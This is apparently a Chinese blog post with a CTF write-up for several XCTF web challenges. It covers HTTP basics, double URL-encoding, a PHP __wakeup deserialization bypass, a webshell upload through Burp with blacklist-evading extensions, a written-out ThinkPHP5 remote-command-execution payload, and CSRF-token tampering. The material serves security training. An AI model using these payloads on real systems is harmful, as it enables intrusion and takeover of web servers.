<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="@TOC
baby_ web
相关知识：http中请求行请求报文以及初始页面一、http中请求行请求报文1、出现的原因：http是个无状态的协议，所以，需要在请求头和响应头中包括自身的一些信息和想要执行的动作，这样，对方在收到信息后，就可以知道你是谁，你想干什么。2、http的请求报文由三部分组成：">
    

    <!--Author-->
    
        <meta name="author" content="John Doe">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="攻防世界web高手进阶题"/>
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="Hexo"/>

    <!--Type page-->
    
        <meta property="og:type" content="article" />
    

    <!--Page Cover-->
    

    
        <meta name="twitter:card" content="summary" />
    
    
    

    <!-- Title -->
    
    <title>攻防世界web高手进阶题 - Hexo</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet" />

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Google Analytics -->
    


<meta name="generator" content="Hexo 5.4.0"></head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about.html">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact.html">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><i class="logo-icon fa fa-cube" aria-hidden="true"></i></a>
        
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2021/05/16/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E8%BF%9B%E9%98%B6/">
                攻防世界web高手进阶题
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2021-05-16</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <p>@<a href="%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%AB%98%E6%89%8B%E8%BF%9B%E9%98%B6%E9%A2%98">TOC</a></p>
<h2 id="baby-web"><a href="#baby-web" class="headerlink" title="baby_ web"></a>baby_ web</h2><p><img src="https://img-blog.csdnimg.cn/20210320195352421.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>相关知识：http中请求行请求报文以及初始页面<br><img src="https://img-blog.csdnimg.cn/20210320082512136.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>一、http中请求行请求报文<br>1、出现的原因：http是个无状态的协议，所以，需要在请求头和响应头中包括自身的一些信息和想要执行的动作，这样，对方在收到信息后，就可以知道你是谁，你想干什么。<br>2、http的请求报文由三部分组成：请求行、请求头、请求体<br>（1）请求行<br>&lt;1&gt;定义：默认1.1长连接, 1.0的以及被淘汰了<br>&lt;2&gt;格式：请求方式 请求资源  协议版本<br>&lt;3&gt;举例：POST /myday33/login.html HTTP/1.1，POST为请求方式，myday33/login.html为请求资源（也就是url），HTTP/1.1为协议版本<br>（2）请求头<br>&lt;1&gt;定义：客户端发给服务端的一些附加信息<br>&lt;2&gt;格式：key:value<br>请求头描述了客户端向服务器发送请求时使用的http协议类型，所使用的编码，以及发送内容的长度，refer，等等。refer是干嘛的，一般用来做简单的防跨站攻击。<br>（3）请求体<br> &lt;1&gt;并不是任何时候都有数据的,只有在post提交并且有参数的时候,请求体才有数据,其他情况没有.<br>&lt;2&gt;格式： name=value&amp;name=value…<br><img src="https://img-blog.csdnimg.cn/20210320085202302.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h2 id="Training-WWW-Robots"><a href="#Training-WWW-Robots" class="headerlink" title="Training-WWW-Robots"></a>Training-WWW-Robots</h2><p>本题涉及到robots协议的知识点，具体可查看博客<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_53549425/article/details/113367014?spm=1001.2014.3001.5501">攻防世界新手题</a></p>
<h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><p><img src="https://img-blog.csdnimg.cn/20210424155632669.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>相关知识：代码审计以及PHP源代码文件<br>phps文件就是php的源代码文件，通常用于提供给用户（访问者）查看php代码，因为用户无法直接通过Web浏览器看到php文件的内容，所以需要用phps文件代替。<br>1.打开浏览器，访问<a target="_blank" rel="noopener" href="http://111.198.29.45:45191/index.phps">http://111.198.29.45:45191/index.phps</a> 得到主页源代码。<br>2.进行代码审计，可看出需要用GET方式给id参数传递一个为“admin”的值，但是会经过一次urldecode()，会将传入的值进行url解码，所以要对admin进行两次url编码。<br>3.对admin字符串进行第一次url编码得到%61%64%6d%69%6e<br>4.将%61%64%6d%69%6e再次进行url编码得到%2561%2564%256d%2569%256e<br>5.访问<a target="_blank" rel="noopener" href="http://111.198.29.45:45191/index.php?id=%2561%2564%256d%2569%256e">http://111.198.29.45:45191/index.php?id=%2561%2564%256d%2569%256e</a> 得到flag.<br>PHP反序列化漏洞：执行unserialize()时，先会调用__wakeup()。</p>
<h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><p><img src="https://img-blog.csdnimg.cn/20210424160014647.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>相关知识：当序列化字符串中属性值个数大于属性个数，就会导致反序列化异常，从而跳过__wakeup()。<br>1.打开题目，进行代码审计，可以看到xctf类只拥有一个public的flag变量，值为111。<br>2.public属性序列化后格式为：数据类型:属性名长度:”属性名”;数据类型:属性值长度:”属性值”。<br>3.本题目中，只存在一个变量，正常情况下序列化后，如下所示。<br><img src="https://img-blog.csdnimg.cn/20210424160102847.png" alt="在这里插入图片描述"><br>4.将设置属性值为2，可导致反序列化异常，如下所示。<br><img src="https://img-blog.csdnimg.cn/20210424160134111.png" alt="在这里插入图片描述"><br>4.根据代码中的?code= 可得知，将得到的序列化字符串赋值给code进行传递。<br>5.访问<a target="_blank" rel="noopener" href="http://111.198.29.45:34517/?code=O:4:&quot;xctf&quot;:2:%7Bs:4:&quot;flag&quot;;s:3:&quot;111&quot;;%7D%E5%BE%97%E5%88%B0flag%E3%80%82">http://111.198.29.45:34517?code=O:4:&quot;xctf&quot;:2:{s:4:&quot;flag&quot;;s:3:&quot;111&quot;;}得到flag。</a></p>
<h2 id="upload1"><a href="#upload1" class="headerlink" title="upload1"></a>upload1</h2><p><img src="https://img-blog.csdnimg.cn/20210427172959316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>相关知识：文件上传漏洞：文件上传漏洞是web安全中经常用到的一种漏洞形式。是对数据与代码分离原则的一种攻击。上传漏洞顾名思义，就是攻击者上传了一个可执行文件如木马，病毒，恶意脚本，WebShell等到服务器执行，并最终获得网站控制权限的高危漏洞。<br>第一步：选择上传文件时发现，客户端有对文件后缀绕过处理<img src="https://img-blog.csdnimg.cn/20210427173048649.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>第二步：利用burp，需要对报文进行修改<br><img src="https://img-blog.csdnimg.cn/20210427173123747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>第三步：顺利上传木马文件，用工具连接即可得到flag<br><img src="https://img-blog.csdnimg.cn/20210427173205929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>如何绕过文件上传黑名单：使用不常见的文件后缀名绕过，例如php3，php4，phtml，asa等等。</p>
<h2 id="php-rce（thinkphp5-远程命令执行漏洞）"><a href="#php-rce（thinkphp5-远程命令执行漏洞）" class="headerlink" title="php-rce（thinkphp5 远程命令执行漏洞）"></a>php-rce（thinkphp5 远程命令执行漏洞）</h2><p>thinkphp5 漏洞利用（具体自行百度）<br><img src="https://img-blog.csdnimg.cn/20210505173341623.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?s=<span class="regexp">/index/</span>\think\app/invokefunction&amp;<span class="function"><span class="keyword">function</span>=<span class="title">call_user_func_array</span>&amp;<span class="title">vars</span>[0]=<span class="title">system</span>&amp;<span class="title">vars</span>[1][]=<span class="title">php</span>%20-<span class="title">r</span>%20%27<span class="title">system</span>(<span class="params"><span class="string">&quot;cat%20../../../flag&quot;</span></span>)</span>;%<span class="number">27</span></span><br></pre></td></tr></table></figure>
<p>贴出payload</p>
<h2 id="Website"><a href="#Website" class="headerlink" title="Website"></a>Website</h2><p>先用sqlmap扫了一下没有sql注入，尝试注册个账号看看，然后发现admin用户可以获得flag，<br><img src="https://img-blog.csdnimg.cn/20210505173453791.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>抓个包看看，点击GETFLAG抓包：看能不能篡改为admin用户</p>
<p><img src="https://img-blog.csdnimg.cn/20210505173510389.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>发现有csrftoken，还有加密的username</p>
<p>csrftoken：为了防止跨站域请求伪造，有的网站请求中会加入这个验证，在登录及登录后续的操作都会让你携带csrftoken，问题在于csrftoken每次刷新界面都要发生变化，所以查到csrf生成的位置就是关键所在，有的网站会把csrftoken放在html代码中返回给前端，这种找起来会比较简单</p>
<p>信息不足，用御剑扫描一下：发现了 test.php 和 action.php页面</p>
<p>其中test.php中有一段 密文 ： E5xqqsvHoznsjlfDm5ryLg==   应该是admin 加密后密文</p>
<p>点开action.php页面  返回了 当前用户的 username 和 新生成的 csrftoken值，</p>
<p>在action.php页面抓包，把username改为  E5xqqsvHoznsjlfDm5ryLg==</p>
<p>提交得到 admin的 csrftoken值：7ee17a7dc9b90025d12c2d8a86584c8e</p>
<p><img src="https://img-blog.csdnimg.cn/20210505173556774.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MzU0OTQyNQ==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>然后在 logined.php中点击GETFALG抓包，把username 和 csrftoken改为刚才获得的值</p>

    </div>

    

    

    <!-- Comments -->
    

</div>
        </section>

    </div>
</div>


</div>

<!-- Footer -->
<div class="push"></div>

<footer class="footer-content">
    <div class="container">
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-6 col-lg-6 footer-about">
                <h2>About</h2>
                <p>
                    This theme was developed by <a target="_blank" rel="noopener" href="https://github.com/klugjo">Jonathan Klughertz</a>. The source code is available on Github. Create Websites. Make Magic.
                </p>
            </div>
            
    <div class="col-xs-6 col-sm-6 col-md-3 col-lg-3 recent-posts">
        <h2>Recent Posts</h2>
        <ul>
            
            <li>
                <a class="footer-post" href="/2021/07/25/buuctf(%E4%BA%8C)/">buuctf（二）</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/07/25/beef/">beef</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/07/18/%E5%9B%BE%E7%89%87%E9%9A%90%E5%86%99/">图片隐写</a>
            </li>
            
            <li>
                <a class="footer-post" href="/2021/07/18/%E5%9B%BE%E7%89%87%E6%9C%A8%E9%A9%AC/">图片木马的制作</a>
            </li>
            
        </ul>
    </div>



            
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <ul class="list-inline footer-social-icons">
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-alpha-dust">
                            <span class="footer-icon-container">
                                <i class="fa fa-github"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://twitter.com/?lang=en">
                            <span class="footer-icon-container">
                                <i class="fa fa-twitter"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.facebook.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-facebook"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.instagram.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-instagram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://dribbble.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-dribbble"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://telegram.org/">
                            <span class="footer-icon-container">
                                <i class="fa fa-telegram"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://www.behance.net/">
                            <span class="footer-icon-container">
                                <i class="fa fa-behance"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a target="_blank" rel="noopener" href="https://500px.com/">
                            <span class="footer-icon-container">
                                <i class="fa fa-500px"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="mailto:test@example.com">
                            <span class="footer-icon-container">
                                <i class="fa fa-envelope-o"></i>
                            </span>
                        </a>
                    </li>
                    
                    
                    <li class="list-inline-item">
                        <a href="\#">
                            <span class="footer-icon-container">
                                <i class="fa fa-rss"></i>
                            </span>
                        </a>
                    </li>
                    
                </ul>
            </div>
        </div>
        <div class="row">
            <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                <div class="footer-copyright">
                    @Untitled. All right reserved | Design & Hexo <a target="_blank" rel="noopener" href="http://www.codeblocq.com/">Jonathan Klughertz</a>
                </div>
            </div>
        </div>
    </div>
</footer>

<!-- After footer scripts -->

<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Tween Max -->
<script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.5/TweenMax.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Custom JavaScript -->

<script src="/js/main.js"></script>


<!-- Disqus Comments -->



</body>

</html>